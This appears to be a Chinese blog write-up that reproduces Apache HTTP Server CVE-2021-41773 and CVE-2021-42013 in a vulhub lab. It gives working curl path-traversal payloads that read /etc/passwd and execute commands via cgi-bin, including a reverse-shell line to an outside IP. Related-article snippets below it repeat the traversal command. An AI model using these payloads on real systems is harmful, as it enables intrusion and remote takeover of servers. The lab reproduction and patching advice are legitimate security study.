CVE-2021-41773&&CVE-2021-42013复现

最新推荐文章于 2024-07-26 13:52:53 发布
最新推荐文章于 2024-07-26 13:52:53 发布
阅读量4.8k 收藏 21
点赞数
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42345596/article/details/120673339
版权

CVE-2021-41773

漏洞原理

Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响:

  • 版本等于2.4.49
  • <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。

攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的服务器上执行任意命令。

影响版本

Apache HTTP Server 2.4.49

漏洞复现

这里用vulhub环境

image-20211009132756467

可以看见,apache是49版本的

image-20211009134615562

image-20211009132808148

使用如下 CURL 命令来发送 Payload(其中/icons/必须是一个存在且可访问的目录):

curl -v --path-as-is http://192.168.190.134:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

image-20211009132939734

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令:

curl -v --data "echo;id" 'http://192.168.190.134:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
或者是
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/192.168.190.146/8888 0>&1' "http://192.168.190.134:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

image-20211009133241904

image-20211009133618588

修复方法

升级到Apache HTTP Server最新安全版本,或使用Apache HTTP Server 非 2.4.49版

CVE-2021-42013

漏洞原理

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。

影响版本

Apache 2.4.49 和 Apache 2.4.50

漏洞复现

启动漏洞环境

image-20211009135641450

image-20211009135704921

curl -v --path-as-is http://192.168.190.134:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

image-20211009140758968

在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行:

curl -v --data "echo;id" 'http://192.168.190.134:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
或者
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; whoami' "http://192.168.190.134:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"

image-20211009140850384

image-20211009141127060

修复方法

升级到Apache HTTP Server安全版本。

github上已经有这两个漏洞的检测工具:https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013

参考文章链接:https://mp.weixin.qq.com/s/mTLYkavkf13g4XosFLBjkg

image-20211009143028432

image-20211009143040836

qyshskx
关注
  • 0
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
Log4j2 CVE-2021-44228漏洞经典复现超详细(vulhub靶场)
精品博客,你值得一看~
08-06 998
log4j2漏洞复现,vulhub漏洞复现,Log4j2 CVE-2021-44228漏洞经典复现(vulhub靶场)
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
MateSnake的博客
05-29 1132
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 713
CVE-2021-41773 漏洞复现
Apache HTTP Server路径遍历漏洞复现0day(CVE-2021-41773|CVE-2021-42013远程代码执行)
good good study
10-09 5337
声明:请勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全法 漏洞描述 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。 fofa查询:server=.
CVE-2021-42013 漏洞复现
Jay17的博客
02-10 515
CVE-2021-42013 漏洞复现
CVE-2021-36934提权复现
good good study
01-31 1281
该漏洞由于Windows中多个系统文件的访问控制表(ACL)过于宽松,使得任何标准用户都可以从系统卷影副本中读取包括SAM、SYSETM、SECURITY在内的多个系统文件。得到用户的哈希值后,可以对其进行暴力破解,也可以直接使用本地管理员用户进行哈希传递,从而获取system权限。系统保护在windows系统中默认启动,因此如果已创建还原点,那么标准用户可直接从卷影副本中访问SAM、SYSETM、SECURITY文件。若系统中不曾创建过还原点,那么后面导出哈希时,ntlm哈希为。系统保护开启(默认开启)
CVE-2021-36934复现
热门推荐
江左盟的博客
07-24 1万+
漏洞简介 微软在7月20日发布紧急安全公告,公开了一个Windows提权漏洞。由于对多个系统文件(包括安全帐户管理器 (SAM) 数据库)的访问控制列表 (ACL) 过于宽松,攻击者可读取SAM,SYSTEM,SECURITY等文件内容,进而获取用户NTLM Hash值,从而通过解密Hash值或Hash传递等方法造成特权提升漏洞。成功利用此漏洞的攻击者可以使用 SYSTEM 权限运行任意代码。 影响范围 微软确认此问题会影响 Windows 10 版本 1809 和更新的操作系统,其他版本还在确认中。 环境
CVE-2021-41773漏洞复现
dreamthe的博客
10-18 7805
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
Apahce HTTPd 2.4.49(CVE-2021-41773)漏洞复现详细教程
W小哥
10-15 8992
一、漏洞描述 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 1、版本等于2.4.49 2、Require all granted(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的服务器上执行任意命令。 二、影响版本 Apache HTTP Server
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
Apollo使用(3):分布式docker部署
游王子的博客
07-24 521
Apollo 1.7.0版本开始会默认上传Docker镜像到,可以按照如下步骤获取。
使用易备数据备份软件,践行虚拟机最佳备份方案
sanyuan7783的博客
07-26 700
新的关键业务应用程序有助于为容器和容器化工作负载赋予更大动力。但是,在可预见的未来,虚拟机的应用仍会普遍存在。容器和虚拟机可以很好地协同工作,适用于大多数关键的 IT 基础设施。因此,备份虚拟机及其包含的数据、服务和应用程序仍然是企业至关重要的任务。本文以 VMware vSphere 虚拟机为例,介绍虚拟机备份的最佳实践方法。
AccessLog| 一款开源的日志分析系统
最新发布
ClkLog的博客
07-26 373
系统采用Java语言、搭配OLAP数据库,涵盖基本web日志分析,同时提供性能分析,帮助高效运维
cve-2021-41773漏洞复现
06-28
### 回答1: cve-2021-41773漏洞是Apache HTTP Server中的一个安全漏洞,攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。 要复现该漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4.49或更早版本。 2. 创建一个名为“test”的目录,并在其中创建一个名为“test.txt”的文件。 3. 启动Apache HTTP Server,并访问以下URL:http://localhost/test/.%2e/%2e%2e/%2e%2e/%2e%2e/test.txt 4. 如果服务器返回“HTTP/1.1 200 OK”响应,则表示漏洞存在,攻击者可以访问服务器上的任何文件。 需要注意的是,该漏洞只影响Apache HTTP Server 2.4.49及更早版本,如果您使用的是更新版本的Apache HTTP Server,则不受此漏洞的影响。同时,为了保护服务器的安全,建议及时更新Apache HTTP Server的版本。 ### 回答2: cve-2021-41773漏洞是一种存在于Apache HTTP Server 2.4.49以前版本的目录遍历漏洞,攻击者可以通过构造恶意的GET请求来访问并读取目标服务器上没有授权读取权限的文件,例如 /usr/local/apache/logs/error.log。 这个漏洞的复现非常简单,只需要使用curl或者其他工具向目标服务器发起恶意的GET请求,即可获取目标服务器上的敏感信息。 首先需要确定目标服务器上是否安装了Apache HTTP Server,并且确认目标服务器的版本是否在2.4.49以前。可以使用nmap等端口扫描工具扫描目标服务器上是否开放了HTTP服务,并尝试访问目标服务器上的默认页面,确认是否安装了Apache HTTP Server。 如果确定目标服务器上存在Apache HTTP Server,并且版本较低,则可以使用curl等工具向目标服务器发起以下恶意请求: curl -v http://<target_ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 其中,<target_ip>需要替换为目标服务器的IP地址,上述请求会尝试访问目标服务器上的/etc/passwd文件。如果能够获取到文件内容,则说明漏洞复现成功。 防范这个漏洞,首先需要及时升级Apache HTTP Server的版本,避免漏洞被攻击者利用。其次,可以使用Web应用程序防火墙(WAF)等安全工具来阻止滥用漏洞的请求,减少漏洞被攻击的风险。最后,建议对服务器配置进行加固,避免敏感文件被访问。 ### 回答3: cve-2021-41773漏洞是一个Apache HTTP Server的安全漏洞,可通过发送特制的HTTP请求来导致服务器上已经存在的目录结构泄露。该漏洞可能会公开网站上存在的私人和敏感信息,并为攻击者进一步攻击网站提供有关目标的有用信息。此漏洞的影响范围很广,可能影响许多版本的Apache HTTP Server。 要复现这个漏洞,我们需要在本地搭建一台Apache HTTP Server并设置虚拟主机。 在此之前,我们需要确保已经安装了Apache HTTP Server,如果没有安装Apache HTTP Server,可以通过以下命令在Ubuntu上安装: sudo apt-get update sudo apt-get install apache2 安装完成后,我们需要设置虚拟主机。在此例中,我们将使用名为example.com的虚拟主机。我们可以通过以下步骤进行设置: 1. 创建一个名为example.com的目录: sudo mkdir /var/www/example.com 2. 将权限设置为Apache用户: sudo chown -R www-data:www-data /var/www/example.com 3. 在我们刚创建的目录中创建一个名为index.html的文件: sudo nano /var/www/example.com/index.html 输入一些HTML代码,例如“ Hi there!” 保存并关闭文件。 4.创建一个apache虚拟主机配置文件: sudo nano /etc/apache2/sites-available/example.com.conf 在配置文件中添加以下行,以配置虚拟主机: <VirtualHost *:80> ServerAdmin webmaster@example.com DocumentRoot /var/www/example.com ServerName example.com ServerAlias www.example.com <Directory /var/www/example.com> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> 保存并关闭文件。 5. 禁用默认虚拟主机: sudo a2dissite 000-default.conf 6. 启用新虚拟主机: sudo a2ensite example.com.conf 7. 配置Apache HTTP Server: sudo service apache2 reload 现在我们已经设置了虚拟主机,我们可以开始测试漏洞。我们可以使用curl发送一个特制的HTTP请求来尝试获取服务器上的文件和目录结构。如下所示: curl -v http://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 上面的请求意味着我们正在请求服务器上的“/etc/passwd”文件,这是一个包含用户的帐号信息的文件。执行上面命令后,我们将看到类似以下内容的响应: ... < HTTP/1.1 200 OK < Accept-Ranges: bytes < Content-Length: 266 < Connection: close < Content-Type: text/plain ... root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... ... 在上面的响应中我们可以看到给出的是服务器上的用户的帐户信息,这表明我们已经成功地利用了漏洞获取了服务器上的敏感信息。 攻击者可以进一步利用此信息对系统进行攻击。此外,在通过Apache HTTP Server公开网站的时候,最好配置适当的安全策略以确保保证系统的安全性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值